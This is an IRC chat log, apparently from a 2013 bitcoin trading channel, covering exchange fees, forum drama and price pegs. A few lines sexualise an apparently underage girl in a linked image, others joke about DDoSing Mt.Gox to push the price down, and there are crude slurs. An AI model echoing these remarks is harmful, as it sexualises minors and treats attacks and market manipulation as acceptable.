Apr 26 20:32:06 You rated user diatonic on Mon Mar 11 14:26:46 2013, giving him a rating of 1, and supplied these additional notes: Attempted and pre-paid for 24 hour mining lease. Unforseeable circumstances changed our plans.. Apr 26 20:32:10 wtf Apr 26 20:32:24 my paste is just doing it's own thing today Apr 26 20:33:12 ;;slap jcpham Apr 26 20:33:17 mmmmhmmmm' Apr 26 20:34:01 truffles, what I'm trying to say, is that you can invest even without having Bitcoins. Just must buy them. Apr 26 20:34:29 And as any start-up investments, it brings you a certain amount of risk-reward. Apr 26 20:35:23 come on... it is all about mind-set. Don't needs to be rich ^^ Apr 26 20:36:08 with what ? Apr 26 20:36:22 That investment is a new company. Apr 26 20:36:23 ;;ticker Apr 26 20:36:24 BTCUSD ticker | Best bid: 137.02000, Best ask: 137.21000, Bid-ask spread: 0.19000, Last trade: 137.02000, 24 hour volume: 255394.07450224, 24 hour low: 120.08900, 24 hour high: 157.00000, 24 hour vwap: 135.59396 Apr 26 20:36:32 that will purchase and run Avalons for you Apr 26 20:36:36 and send you proceeds Apr 26 20:37:14 so you don't need to waste time/lectricity/head-ache, customs bureaucracy and so forth Apr 26 20:37:32 OK Apr 26 20:37:57 But isn't bitcoin-assets all about investing ? Apr 26 20:38:11 investing != throwing money. Apr 26 20:38:21 about what ? Apr 26 20:38:42 mircea_popescu, no one is throwing money. Just taking risks. Apr 26 20:38:52 which is not the same Apr 26 20:38:56 mircea_popescu: is it illigal to buy\sell mpex accounts? Apr 26 20:39:02 Cylta nope. Apr 26 20:39:16 dubious from a security pov maybe Apr 26 20:40:20 i love it when doms throw money at me Apr 26 20:40:22 I can take risk, but I like to be paid for it. Apr 26 20:40:40 mp no way to change pgp key ? Apr 26 20:40:47 if asked ? Apr 26 20:42:09 [BTCTC] [ASICMINER-PT] 1 @ 1.18 BTC [-] Apr 26 20:42:19 freak Apr 26 20:42:53 well you can register a new one and push to it. Apr 26 20:44:13 just 30 btc Apr 26 20:44:17 :) Apr 26 20:48:48 truffles, how much does a seat on the NYSE cost? Apr 26 20:49:06 and truffles, how is that related to their operating costs? Apr 26 20:49:20 rhetorical questions. too much for you to afford, and it's not. Apr 26 20:50:28 they are different Apr 26 20:50:33 you encrypt orders with gpg Apr 26 20:50:42 print them out Apr 26 20:50:48 fly them to romania on a carrier pigeon Apr 26 20:51:34 benkay: may as well ask how the cost of a NYC taxi medallion relates to the cost of the bureaucrat's pen that signs the paperwork. Apr 26 20:52:50 fucking unfair comparison of the century. i hate taxi medallions. Apr 26 20:53:02 except that the bureaucrat doesn't own the medallion organization, the mob does Apr 26 20:53:13 truffles: vipcoin is confusing, but otherwise legit Apr 26 20:53:16 but i think we're making the same points. Apr 26 20:53:29 truffles: here is exact process how 30 bitcoins are turned into vipcoin: https://www.youtube.com/watch?v=IQBOw88ksXA Apr 26 20:53:35 what's vipcoin even ?! Apr 26 20:53:42 and yet vipcoin doesn't break top page google Apr 26 20:54:07 BTCOxygen, ping Apr 26 20:55:02 IMHO taxi medallions are a fair comparison. They, just as the MPEx fee, exist to keep the riffraff out. Apr 26 20:55:28 truffles: seek 1:40 for teenage girl Apr 26 20:55:54 Were it not for medallions, NYC would probably look like Shanghai (rickshaws, etc.) I'm fine with that, but the rulers of the place evidently aren't Apr 26 20:55:57 teenage is the important part Apr 26 20:56:34 asciilifeform you're neglecting the entire geographical monopoly angle. Apr 26 20:56:51 MP has said, in essence, that he doesn't want MPEx to become a Shanghai crawling with the equivalent of rickshaws. Apr 26 20:56:57 If I understand correctly Apr 26 20:57:19 yet payola is the realm of criminal forums Apr 26 20:57:21 so which is it? Apr 26 20:57:22 :) Apr 26 20:57:59 asciilifeform i don't have a problem with rickshaws per se. Apr 26 20:58:11 there's historically been small corps listed, it's not that. Apr 26 20:59:08 well Apr 26 20:59:10 mircea_popescu: we were talking about the 30 BTC user account fee, right? rather than listings Apr 26 20:59:13 thats what vip is about Apr 26 20:59:23 teenage girls, database management and company lunches Apr 26 20:59:57 asciilifeform there's easy access for someone even with 0.1 btc. there's pts, there's brokers. Apr 26 21:00:06 [HAVELOCK] [VTX] 12 @ 0.4248 = 5.0976 BTC [+] Apr 26 21:00:12 truffles: no soup for you Apr 26 21:00:33 i think mircea_popescu plays the soupnazi part well Apr 26 21:01:01 no no no, the role of taxi medallions is to reduce the number of taxis on the street Apr 26 21:01:04 mircea_popescu: that's like saying that "eTrade" with its $x/trade fees is a perfectly good alternative to a seat on the NYSE Apr 26 21:01:26 well... would you say seat on nyse = london cab medallion ? Apr 26 21:01:31 ezdiy ty Apr 26 21:01:45 mircea_popescu: sure Apr 26 21:01:46 mircea_popescu would be only too happy to have more traders on his exchange, he just doesn't want to deal with the riffraff. he wants others to aggregate riffraff orders and place them on MPEx. Apr 26 21:02:16 at least I think that's what he wants. open to correction on that count. Apr 26 21:02:18 asciilifeform well then everything's everything and wtf. Apr 26 21:02:35 benkay there was some pretty good discussion with pgp on this, lemme d ig Apr 26 21:02:49 thanks mircea_popescu, feel free to pm it over Apr 26 21:02:59 benkay: riffraff interested in automated trading are more or less written out of the script. MP runs his own house how he likes, I'm fine with that. But why not call things by their real names. Apr 26 21:03:42 asciilifeform what's the real name, then? medallions are a competition inhibitor, the exchange seat fee is just an "are you serious" check Apr 26 21:03:45 it's not even that much money Apr 26 21:04:01 asciilifeform: real names are bad for pr Apr 26 21:04:51 http://i.imgur.com/Haw7Qy4.jpg Apr 26 21:04:52 haha Apr 26 21:05:15 lmao Apr 26 21:05:16 benkay: the bureaucrats (in practice) own NYC, and charge whatever the hell they want for taxi licenses. a bar can charge for entrance. nothing wrong with that. what I'm unclear on is why the MP fee is a different kind of animal. Apr 26 21:05:28 orkaa: +1 for underage, -1 not naked Apr 26 21:05:52 asciilifeform: thats how it works Apr 26 21:05:58 i saw this on tv some time ago, it's real :) Apr 26 21:06:00 asciilifeform: in general its called vendor lock-in Apr 26 21:06:32 asciilifeform is there a way i can run a cab in london just for a day ? Apr 26 21:06:56 mircea_popescu: I imagine you could buy a medallion and sell it the next day, if you wanted to Apr 26 21:07:05 just like an MPEx account Apr 26 21:08:07 can you actually sell those ? Apr 26 21:08:17 probably Apr 26 21:08:17 maybe the disagreement is borne out of me not understanding taxi medallions too well. Apr 26 21:08:21 mircea_popescu: IDK about London, but in most places you can Apr 26 21:08:31 afaik it's just this nonsense to keep people who would like to work off Apr 26 21:08:35 sorta like a union Apr 26 21:08:44 mircea_popescu: If I recall, most NYC drivers take out monstrous loans to buy medallions. Apr 26 21:08:55 most don't even buy the medallions Apr 26 21:08:58 others do Apr 26 21:09:02 ibankers and whatnot Apr 26 21:09:06 meh. Apr 26 21:09:12 why people who dont understand basic market forces (if you have little competition, it makes sense to introduce artificial scarcity) want to trade on mpex? Apr 26 21:09:31 ezdiy that absolutely isn't the rationale. Apr 26 21:09:49 mircea_popescu: occam is cutting his veins though :) Apr 26 21:10:02 i know. Apr 26 21:10:02 mircea_popescu: i'm not dismissing it, whatever the reason its totally legit Apr 26 21:10:10 the problem with cheapo/clueless investors is that they follow trends Apr 26 21:10:20 this induces huge volatility which then wrecks assets. Apr 26 21:10:23 ezdiy: I'm not clamouring to buy an MPEx account for a penny, just objecting to the notion that the fee is somehow different from taxi medallions Apr 26 21:10:31 i still think it is. Apr 26 21:10:46 I agree. Apr 26 21:10:50 not all customers are good customers. Apr 26 21:11:12 and when money is involved as a core part of the business, many of your customers will in fact be bad customers without quality control. Apr 26 21:11:13 mircea_popescu: you do that at the cost of huge spreads though Apr 26 21:11:27 as long people are content with those, well why not Apr 26 21:11:34 your idea of rate limiting the market holds water Apr 26 21:12:01 well the problem with the "as long as people are content" argument Apr 26 21:12:08 is that it's how we ended up with shit on tv. Apr 26 21:12:24 mircea_popescu: How would you personally explain the apparent lack of competition to MPEx? Is it simply the fact that no one else has the "reputation capital" ? Apr 26 21:12:27 people have this incredible ability to "be content" with anything. frog in boiling water experiment if you know it. Apr 26 21:12:40 mircea_popescu: yup Apr 26 21:12:44 boil em slow :) Apr 26 21:12:54 asciilifeform it's a complicated web. no one has the competence, or the capital, or the reputation, or the connections, etc etc Apr 26 21:12:59 they just feed into each other. Apr 26 21:13:22 truffles: I meant the banal fact that MPEx works as it says on the box, and none of the vaguely similar services proved to do the same Apr 26 21:13:30 Mp, has a stellar reputation. Unless you beleive asshole trolls and other people that are poor Apr 26 21:13:59 i think people grossly misrepresent what all is involved. Apr 26 21:14:58 clouds can be cleared up only if youre open about it Apr 26 21:15:09 heck even bitcoinica eventually became opensource :) Apr 26 21:15:12 lmao Apr 26 21:15:43 so people are ok w/ bitfinex because its obvious what theyre dealing with Apr 26 21:16:48 black boxes give room to a lot of speculation Apr 26 21:16:50 Ok, let's see if I understand: the 30 BTC is for keeping MPEx a market full of people who measure 1000 times "before cutting once." No trendoids, etc. Now let's say Warren Buffet (or somesuch) opens WBEx, charging 1 BTC. Apr 26 21:16:55 as well as affiliate marketing schemes for vipcoin Apr 26 21:16:58 it fills up with trendoids Apr 26 21:17:16 asciilifeform problem with your let's suppose is that it's nonsensical. Apr 26 21:17:21 last thing he'd do is that. Apr 26 21:17:32 he'd open a 1000 btc one first, he'd partner with me 2nd. Apr 26 21:17:41 ok, someone else with a bag full of BTC and a resonably good meatspace reputation, then. Apr 26 21:18:00 but do you understand your own example ? Apr 26 21:18:17 buffy is famous for having told his bh specialist Apr 26 21:18:27 "if the next trade happens a year or so from now i'll be very happy" Apr 26 21:19:07 [HAVELOCK] [HIM] 2 @ 1.7051 = 3.4102 BTC [-] Apr 26 21:19:11 what I'm rather hazy on is how well MPEx would hold up against a "good enough" clone that meets the basic criterion of "not being an outright scam" (AFAIK none of the MPEx competitors have met this standard) Apr 26 21:19:29 it holds pretty well Apr 26 21:20:15 asciilifeform im not sure what the incentive is exactly. you'd finance a clone rather than buy shares because ... ? Apr 26 21:20:18 Wait, I trust MP - so who is this you are proposing? Just some random asshole with a website? Apr 26 21:20:24 s.dice competition never materialised EXACTLY because s.dice listed. Apr 26 21:20:31 once that happened it's impossible to finance a clone anymore. Apr 26 21:20:57 jborkl: no, not a random arse, someone with a good reputation, hypothetically Apr 26 21:21:03 people really underestimate network effects Apr 26 21:21:03 [BTCTC] [ASICMINER-PT] 2 @ 1.2 = 2.4 BTC [+] Apr 26 21:21:13 there is no one with enough sense and enough money currently Apr 26 21:21:23 sdice, mtgox and mpex are examples of such Apr 26 21:21:26 strike one and two Apr 26 21:21:46 so srsly asciilifeform, let's say your reputation is enoug, and you have 10k btc to burn. Apr 26 21:21:54 you decide it has to burn in this space. Apr 26 21:21:55 jborkl: true, just as there is no semiconductor plant owner with the good sense to drop some of his pocket change on building a million ASIC miners and running them in his own mansion. Apr 26 21:21:56 jborkl: competition eventually overcomes the network effect resistance Apr 26 21:22:01 jborkl: inb4 bitvegas ipo Apr 26 21:22:03 a. you buy s.mpoe shares b. you try and make a competitor. Apr 26 21:22:05 which is your pick ? Apr 26 21:22:59 mircea_popescu: By this logic Pepsi ought not to exist, they should just re-sell Coke? Apr 26 21:23:08 they do. Apr 26 21:23:14 they do? :) Apr 26 21:23:18 a shitty clone of it Apr 26 21:23:24 https://bitcointalk.org/index.php?topic=188177.0 Apr 26 21:23:46 mircea_popescu: how do i buy cola in kfc :) Apr 26 21:24:28 what if bitvegas started kfc Apr 26 21:24:33 and bundled their cola with it? Apr 26 21:24:47 would it make sense to invest in mpex then? Apr 26 21:24:58 im unsure wtf bitvegas is. Apr 26 21:25:18 o the team fortress thing ? Apr 26 21:25:24 mircea_popescu: :) Apr 26 21:25:38 its easy to measure growth Apr 26 21:25:43 where it is stalled and where it is not Apr 26 21:25:46 anyway, what time exactly do options expire MP? in UTC? Apr 26 21:25:58 mircea_popescu: there could be logical reasons for starting one's own "MPEx, with blackjack and hookers." Say I want to use evil altchains. And, AFAIK MPEx shares are non-voting, so it isn't that I could buy enough of them to make MP do this deed. Apr 26 21:26:10 asciilifeform now you're talking angles. Apr 26 21:26:16 originally discussion was straight clone. Apr 26 21:26:37 if you mean start a competitor with an angle, it all boils down to whether the angle a. actually helps you and b. is good enouigh to push you Apr 26 21:26:53 mircea_popescu: copycats work perfectly good Apr 26 21:27:00 be the underdog and wait for the uber dogs demise Apr 26 21:27:06 lets see ... gblse? Apr 26 21:27:06 :) Apr 26 21:27:14 mircea_popescu: ok, let's stick to clones. Picture Bill Gates, a hypothetical BGEx with a 5 BTC fee. Apr 26 21:27:27 ezdiy again people underestimate what goes on in the background. Apr 26 21:27:29 truffles: not by market forces, but by something stupid Apr 26 21:27:44 asciilifeform and he's doing this on pgp ? Apr 26 21:27:57 [MPEX] [S.MPOE] 7513 @ 0.00070108 = 5.2672 BTC [+] Apr 26 21:28:04 mircea_popescu: sure, I agree, this is a stretch of the imagination. but let's imagine. Apr 26 21:28:15 mircea_popescu: yes, pgp. Apr 26 21:28:37 ok this i wish to see. Apr 26 21:28:40 mircea_popescu: AFAIK you don't have a monopoly on PGP Apr 26 21:28:49 asciilifeform: you're wasting your time, btw Apr 26 21:28:51 so bill gates is making a mpex clone complete with pgp and everything. Apr 26 21:29:05 +1000 points for me for being so cool. will any of the big people switch to him ? maybe so. maybe not. Apr 26 21:29:16 i can probably exit to jpm for a billion at that point anyway. Apr 26 21:29:24 mp stands, but might possibly fall, because mircea_popescu is uber consistent in everything Apr 26 21:29:38 which also means you cant convince him by make believe arguments Apr 26 21:29:41 at which poin tyhe deal becomes jpmpex vs bgex Apr 26 21:29:45 and i gues jpmpex wins Apr 26 21:29:51 i won't be there to see it likely, but anyway. Apr 26 21:30:05 asciilifeform: the general term is jerk irl :) Apr 26 21:30:25 yep Apr 26 21:30:29 the bitch army is impressive Apr 26 21:30:30 :) Apr 26 21:30:32 ezdiy: I think you misunderstand. I'm not trying to convince MP of anything in particular. Just playing out a thought experiment: what would happen if MPEx actually had competition. Apr 26 21:30:35 jurov: ohai! Apr 26 21:31:16 rpietila: "I am currently running a 1.5 Class Bitcoin Supernode, and having a hard time to report on all things. This is a beta, our organisation is not perfect. I am arranging the supernode summit in Porvoo, Finland. The place where I am currently staying is Hotel Kämp, the best in Helsinki. My room" Apr 26 21:31:29 truffles: rpietila took it from the other end Apr 26 21:31:37 mp first build something tangible, then the bitch army Apr 26 21:31:52 kakobrekla: what on earth is a Bitcoin Supernode? Apr 26 21:31:59 yes! Apr 26 21:32:00 rpietila is apparently starting with the bitch army and maybe turn out to be not elaborate troll and come up with something Apr 26 21:32:11 ezdiy it's kinda funny to compare "pic of mp with people" vs "pic of foreveralone btctalk dud" Apr 26 21:32:22 mircea_popescu: indeed :) Apr 26 21:32:32 rpietila had too much cocaine Apr 26 21:34:16 so much shame goat burned the cover Apr 26 21:34:29 that thread was so full of gold Apr 26 21:34:39 totally. Apr 26 21:34:54 goat gets confused in troll gold threads. Apr 26 21:35:35 https://bitcointalk.org/index.php?topic=174620.0;all Apr 26 21:36:11 still Apr 26 21:36:16 interesting phenomena Apr 26 21:36:22 bitch armies, whiteknighting and all Apr 26 21:36:30 because those are irrelevant Apr 26 21:36:37 i quote Apr 26 21:36:38 Think of this as a book, or at least as a quality blog, to be enjoyed with quality wine and cigars in candle light. Apr 26 21:36:38 important is only network effect Apr 26 21:36:47 comedy central in that setting? Apr 26 21:37:04 take mtgox, fe, everyone agrees their stuff is sub-par Apr 26 21:37:13 no bitch army, everybody hates magicaltux's guts Apr 26 21:37:17 yet its the biggest Apr 26 21:37:48 kakobrekla lol candlelight and screen. sounds legit Apr 26 21:38:00 kakobrekla: yup, thats how i understood it Apr 26 21:38:15 i mean, the guy clearly stated to be not taken seriously Apr 26 21:38:16 so hey Apr 26 21:38:17 On the same day that federal investigators pleaded with the public for photos and videos that would help them identify the Boston Marathon bombers, the Department of Homeland Security and the FBI released a memo stating the “discreet use of cameras or video recorders” could be interpreted as a sign that a terrorist act is being planned. Apr 26 21:38:26 and then gives free advice of mid-range silver vendor Apr 26 21:38:32 i'm ok with that Apr 26 21:39:06 oooo Apr 26 21:39:07 http://static.iltalehti.fi/uutiset/13549021_uu.jpg Apr 26 21:39:09 this delivers Apr 26 21:39:25 silver stackin Apr 26 21:39:29 imma gona print a shitload of qr codes Apr 26 21:39:32 lmao Apr 26 21:39:39 stick it allover me Apr 26 21:39:57 i'll take pics of your qr codes and baby giraffe Apr 26 21:40:07 [HAVELOCK] [VTX] 2 @ 0.4781 = 0.9562 BTC [+] Apr 26 21:40:12 oppulence Apr 26 21:41:38 truffles: what do you mean? Apr 26 21:42:39 no, still nothing Apr 26 21:43:16 truffles: world is full of hypocrisy Apr 26 21:45:22 well, there is that thing Apr 26 21:47:31 https://docs.google.com/spreadsheet/ccc?key=0ApraDvGtZTsbdGxTZGxreXhHUTRCM0pmakNpU3NkQmc#gid=0 Apr 26 21:47:43 truffles: being a bitch means you strongly defend your cult figure while youre subject ot heir will Apr 26 21:48:07 i thought it just meant being annoying. Apr 26 21:48:09 truffles: being polite just means not giving a crap about things you cant change Apr 26 21:48:12 for example, opionons Apr 26 21:48:23 mircea_popescu: from the pov of dictator, it is :) Apr 26 21:48:43 lolwut Apr 26 21:49:02 subjects are always annyoing Apr 26 21:49:03 you know Apr 26 21:49:08 they have their stupid feelings and such Apr 26 21:49:16 i dunno what dictators you've been hanging out with... Apr 26 21:49:54 cognitive dissonance is to be cherished Apr 26 21:49:57 to manipulate Apr 26 21:50:03 but its uber annoying at the same time Apr 26 21:50:56 truffles: i think mp is strongwilled enough to just feign ignore Apr 26 21:51:06 curiosity and strong will results just not responding :) Apr 26 21:53:02 truffles: better come up with some plot Apr 26 21:53:07 to ignite the nuclear war again Apr 26 21:53:16 between soupnazi and kim jong un of finland Apr 26 21:54:06 this is making so little sense... Apr 26 21:54:19 why finland? Apr 26 21:54:30 http://polimedia.us/dtng/c/src/134491269729.jpg have some water buffalo. Apr 26 21:54:32 its the new bitcoin supernode Apr 26 21:56:08 mircea_popescu: i'm yuzhe, btw Apr 26 21:56:11 i wish reptil dude would come around Apr 26 21:56:12 "some douche", pfft Apr 26 21:56:16 tell her shes fugly Apr 26 21:56:29 kakobrekla: the circle would be complete! Apr 26 21:56:34 man... i have no idea what's going on. Apr 26 21:57:06 mircea_popescu, truffles is speaking Apr 26 21:57:26 so who's yuhzer Apr 26 21:57:59 so i Apr 26 21:58:40 mircea_popescu, can you say when the April MOPE statement will be published? Apr 26 21:58:45 mircea_popescu: https://www.youtube.com/watch?v=6aURG-o7O-I Apr 26 21:58:48 this is yuzhe :) Apr 26 21:58:53 SlipperySlope yes, in a few hours Apr 26 21:59:10 many thanks! Apr 26 21:59:11 usually within a little of the last friday of the month ending Apr 26 22:02:08 [HAVELOCK] [KCIM] 1 @ 1.21 BTC [-] Apr 26 22:02:17 [BTCTC] [PAJKA.BOND] 10 @ 0.1 = 1 BTC [+] Apr 26 22:02:46 [BTCTC] [ASICMINER-PT] 1 @ 1.246999 BTC [+] Apr 26 22:03:07 [HAVELOCK] [VTX] 13 @ 0.4649 = 6.0437 BTC [-] Apr 26 22:04:15 [BTCTC] [PAJKA.BOND] 6 @ 0.101736 = 0.6104 BTC [+] Apr 26 22:05:50 incase anyone is curious, i solved the IP address leak from emails problem i was talking about yesterday Apr 26 22:06:07 [HAVELOCK] [HIM] 1 @ 1.7899 BTC [+] Apr 26 22:06:20 the soluttion, is, essentially to run your own mailserver, on a separate ip (that will be revealed publicly) and have it strip the appropriate headers out of the messages as they fly thorugh Apr 26 22:06:29 i followed this post: http://www.stardothosting.com/blog/2010/07/remove-mail-headers-in-postfix-outgoing-mail/ Apr 26 22:06:33 worked like a c harm Apr 26 22:06:34 charm Apr 26 22:07:13 sounds like a winner. Apr 26 22:08:35 ugh, otc is just such a scam fest Apr 26 22:09:01 kinda. Apr 26 22:09:09 its not worth the hassle Apr 26 22:09:18 i've not been there since Apr 26 22:09:23 o hey. since last april. Apr 26 22:09:32 birthday cake! Apr 26 22:09:33 1 yr Apr 26 22:10:01 21:09.45 —ChanServ— Registered : Apr 10 19:16:21 2012 (1 year, 2 weeks, 1 day, 23:53:24 ago) Apr 26 22:10:10 hehe Apr 26 22:14:13 [BTCTC] [ASICMINER-PT] 2 @ 1.246999 = 2.494 BTC [+] Apr 26 22:16:44 http://i.imgur.com/c5q3yfc.jpg Apr 26 22:16:48 LOOK AT MY JEFE Apr 26 22:17:08 he has the optional laser thermal vision Apr 26 22:28:08 [HAVELOCK] [HIM] 2 @ 1.7051 = 3.4102 BTC [-] Apr 26 22:33:53 https://bitcointalk.org/index.php?topic=174620.msg1954004#msg1954004 Apr 26 22:33:54 O_o Apr 26 22:34:30 all the fun happens on forums :( Apr 26 22:36:31 the coolest guys in Bitcoin Universe Apr 26 22:37:30 when we start talking about mB? Apr 26 22:37:52 i don't know Apr 26 22:37:58 so far he is the only one i've seen do that Apr 26 22:38:04 thats in the other room #bitcoin-massets Apr 26 22:38:14 or #mbitcoin-assets Apr 26 22:38:19 whatever is it. Apr 26 22:38:20 or w\e it is- MPEX membership 30 milliion billion Apr 26 22:38:24 #bitcoin-anal Apr 26 22:39:03 im reading reptilas posts and numbers but i still cant figure out is he rich or poor? Apr 26 22:39:24 EL JEFE Apr 26 22:39:25 numbers are big Apr 26 22:39:31 but the units are kinda small Apr 26 22:39:36 %confused% Apr 26 22:39:41 too confusing for me, I think he has 2.4 Bitcoins Apr 26 22:39:43 what is this thread Apr 26 22:39:48 i'm readin kakobrekla Apr 26 22:39:54 hehe Apr 26 22:39:56 i don't even Apr 26 22:42:12 HOLY SHIT that guys running a 1.5 Class Supernode! Apr 26 22:42:56 wtf does that even mean? Apr 26 22:43:09 it's pretty badass Apr 26 22:43:17 if you haven't been paying attention Apr 26 22:43:22 I know what a class 1A Supernova is Apr 26 22:43:39 i know you want to be better than him but you can't Apr 26 22:43:43 but not a class 1.5 supernode Apr 26 22:44:07 shrug Apr 26 22:44:11 so is a class 1.2 supernode better or a class 1.7? Apr 26 22:44:27 https://bitcointalk.org/index.php?topic=174620.msg1911371#msg1911371 Apr 26 22:45:10 i'm not sure if that helps explain or makes it worse Apr 26 22:45:11 how did you not know this Apr 26 22:45:19 are you completley uneducated? Apr 26 22:45:28 my impression is the guy is a car salesman Apr 26 22:45:28 its like.. basic stuff! Apr 26 22:45:35 ahahaha Apr 26 22:45:43 this is so good Apr 26 22:45:47 where did you find this Apr 26 22:45:53 he says all kindsa fancy things to impress idiots Apr 26 22:46:02 [MPEX] [S.MPOE] 9176 @ 0.00070108 = 6.4331 BTC [+] Apr 26 22:46:03 [MPEX] [S.MPOE] 10775 @ 0.00070158 = 7.5595 BTC [+] Apr 26 22:46:06 in the hopes of selling them a lemon Apr 26 22:46:06 [MPEX] [S.MPOE] 7149 @ 0.00070497 = 5.0398 BTC [+] Apr 26 22:46:26 That made it worse, made no sense Apr 26 22:46:35 lol Apr 26 22:46:55 and he donated to the forum Apr 26 22:46:58 ! Apr 26 22:47:15 President etc. of Silvervault, Hopea.fi, EIH among others. Apr 26 22:47:25 seriously "among others" is vain Apr 26 22:47:30 i can pick apart a sentence Apr 26 22:47:41 i like this guy Apr 26 22:48:17 badge of scammer, donated to forum Apr 26 22:48:45 badge of scammer among others Apr 26 22:49:14 Seeing $115 ever again seems unlikely to me. Apr 26 22:49:16 could just be cultural differences Apr 26 22:49:26 his quote Apr 26 22:49:33 ;;bids 115 Apr 26 22:49:36 it hit that yesterday Apr 26 22:49:37 There are currently 33575.454 bitcoins demanded at or over 115.0 USD, worth 4106373.85398 USD in total. | Data vintage: 0.0059 seconds Apr 26 22:49:38 lol Apr 26 22:49:47 yeah we're one trade from $115 at all times Apr 26 22:49:55 if you sell $4 million worht, it'll come up Apr 26 22:50:03 one trade that sets off the rest of them Apr 26 22:50:19 ;;market sell 33575 Apr 26 22:50:19 then gox gets ddosed Apr 26 22:50:20 A market order to sell 33575 bitcoins right now would net 4106321.6274 USD and would take the last price down to 115.0000 USD, resulting in an average price of 122.3030 USD/BTC. | Data vintage: 42.8787 seconds Apr 26 22:50:27 then bitstamp closes Apr 26 22:50:30 lets see if I have this correct Apr 26 22:50:33 then bitinstant gets ddosd Apr 26 22:50:37 easy $115 Apr 26 22:50:43 then another exchange shuts down Apr 26 22:50:46 that's more like $50 Apr 26 22:50:51 sell a little at MTGOX, ddos MTGOX, then use the trollbox on btce Apr 26 22:50:52 but whatever Apr 26 22:51:00 $50 drop Apr 26 22:51:05 yeah 6 of us can make 115 happen Apr 26 22:51:12 if we put our heads together Apr 26 22:51:18 you mean coins together Apr 26 22:51:23 or that Apr 26 22:51:38 he doesn't understand yet Apr 26 22:52:07 [HAVELOCK] [VTX] 6 @ 0.4549 = 2.7294 BTC [-] Apr 26 22:53:03 his class 1.5 superchoad does not rely on the network for price though.. Apr 26 22:53:35 supertoad is disqualified. Apr 26 22:53:51 withdrawals depricated. Apr 26 22:54:48 better upgrade to aa class 1.4 superchoad just to be sure Apr 26 23:03:08 [HAVELOCK] [VTX] 3 @ 0.4499 = 1.3497 BTC [-] Apr 26 23:18:30 am back, had another interesting btc-related discussion irl with a forex trader... so hard to explain how things work there Apr 26 23:18:39 [BTCTC] [ASICMINER-PT] 2 @ 1.247 = 2.494 BTC [+] Apr 26 23:18:46 hi ezdiy Apr 26 23:19:40 he was like "you should haste, large players will come and make mp do their bidding" Apr 26 23:20:22 when i explained my problems with mpex interface, why the development is so slow Apr 26 23:21:50 btw, expect options on coinbr to be frozen on opex for a while Apr 26 23:22:02 k Apr 26 23:46:33 [MPEX] [S.MPOE] 2201 @ 0.00070497 = 1.5516 BTC [+] Apr 26 23:53:34 [MPEX] [S.DICE] 7 @ 0.00299999 = 0.021 BTC [+] Apr 26 23:55:19 my impression is the guy is a car salesman <<< lol that makes us 2 Apr 26 23:56:40 aww jurov you should send him to me Apr 26 23:57:44 i will. but he's also webdesigner, willing to help me Apr 26 23:58:17 forex trader slash web designer ? Apr 26 23:58:25 ok wtf: https://twitter.com/maxkeiser/status/327879387292770305 Apr 26 23:59:08 i got "sorry, this tweet is too retarded for you to read. twitter does not allow very retarded tweets be read." Apr 26 23:59:10 should i worry ? Apr 26 23:59:45 [BTCTC] [ASICMINER-PT] 2 @ 1.246 = 2.492 BTC [-] Apr 26 23:59:59 Price pegs never work -- why is that not clear to people, especially Max!? Apr 27 00:00:03 I love the reply to him though. Apr 27 00:00:51 mod6 he's jealous that i pegged the bitcoin to the dollar at ~100 Apr 27 00:01:35 Heheheh. Apr 27 00:01:46 apparently went out of his "omg 400 500 1546975867" Apr 27 00:01:56 hes just trolling Apr 27 00:02:05 course the retards that follow him can't remember 15 days ago so it's all good. Apr 27 00:02:46 I liked him better when he only mentioned Bitcoin once in a while.. when he got all "bitcoin jesus" on everyone I'm like, you're not helping, you're just pushing people into something they don't understand yet. Apr 27 00:03:23 And now, price pegs for bitcoin???! Eff no. Bitcoin is the last bastion of economic freedom in the world. Apr 27 00:03:45 besides, it was already pegged to $5 some 9-10 months ago. but then pirate vanished. Apr 27 00:04:03 dunno if fed can do a better job than pirate Apr 27 00:04:04 there isn't any reason that there should be a price peg for such a thing. And besides what would be the point of options on bitcoins if the price was pegged? Apr 27 00:04:29 [BTCTC] [ASICMINER-PT] 1 @ 1.1927 BTC [-] Apr 27 00:04:39 i dont see the $5 level as a peg, it certainly wasn't stated anywhere, it was just suppression, and undervalued Apr 27 00:05:22 jkjk Apr 27 00:05:26 you know that scam movie 'the secret' Apr 27 00:05:37 let me tell you, its the other way around Apr 27 00:05:41 haha, no. but, lol Apr 27 00:05:57 smh Apr 27 00:06:02 but it would be really fanny for bernanke to have to calm markets when gox lag happens Apr 27 00:06:03 when you want fiat there is none, but when you got too much they throw it in your face Apr 27 00:07:47 btw, did oprah endorse btc already? Apr 27 00:07:58 no, that was dr. phil Apr 27 00:08:06 she's still waiting for blockchain sync Apr 27 00:08:08 i heard she has serious whales in audience Apr 27 00:08:15 lol Apr 27 00:09:11 [MPEX] [S.MPOE] 45199 @ 0.00070749 = 31.9778 BTC [+] Apr 27 00:09:18 im holding out for roger and cunty lee Apr 27 00:10:21 [BTCTC] [ASICMINER-PT] 1 @ 1.21 BTC [+] Apr 27 00:11:14 lol @ thick Apr 27 00:11:22 anyway, just had to come in here and vent a bit about this stuff. Apr 27 00:11:38 lol jurov Apr 27 00:12:08 btw, if anyone doesn't know Girlfawkesy, she's an actual girl. send her all your btc. Apr 27 00:12:29 what does she pay in in divs? Apr 27 00:12:34 I mean, if anything, why not just peg like 1 satoshi to a certain unit of gold? Then it would have a sudo-peg via gold, correct? Apr 27 00:12:40 did she qualify in topless? Apr 27 00:12:56 the peg idea is so moronic I bet we couldnt have come up with it if we were trying to be morons Apr 27 00:12:58 im wondering why is there no MaxCoin yet Apr 27 00:13:16 kakobrekla he hasn't figured out the fork yet. Apr 27 00:13:21 still working on spoon Apr 27 00:13:27 lol Apr 27 00:13:31 ThickAsThieves: ok thank you. I was feeling pretty stupified for a few minutes there. Apr 27 00:13:39 <~~~ actual vagina Apr 27 00:13:40 ;;google pegging Apr 27 00:13:41 lol still working on spoon Apr 27 00:13:42 Pegging (sexual practice) - Wikipedia, the free encyclopedia: ; Pegging - Wikipedia, the free encyclopedia: ; If You Want a More Thoughtful Boyfriend, Try Pegging Him - Jezebel: Apr 27 00:13:48 there. pegging. a sexual practice. Apr 27 00:13:52 ginger up max's ass Apr 27 00:14:10 Actually, I was thinking about making a pegging set, but I dunno how thrilling that would be for you boys Apr 27 00:14:13 mod6 satoshi's already practically pegged to some miliwatt or microwatt anyway Apr 27 00:14:56 jurov: ahh, hmm. Apr 27 00:15:01 [BTCTC] [ASICMINER-PT] 1 @ 1.2466 BTC [+] Apr 27 00:15:11 but elec cost is variable too Apr 27 00:15:31 I like the idea of only supply/demand governing the price, btc needs natural price signals. 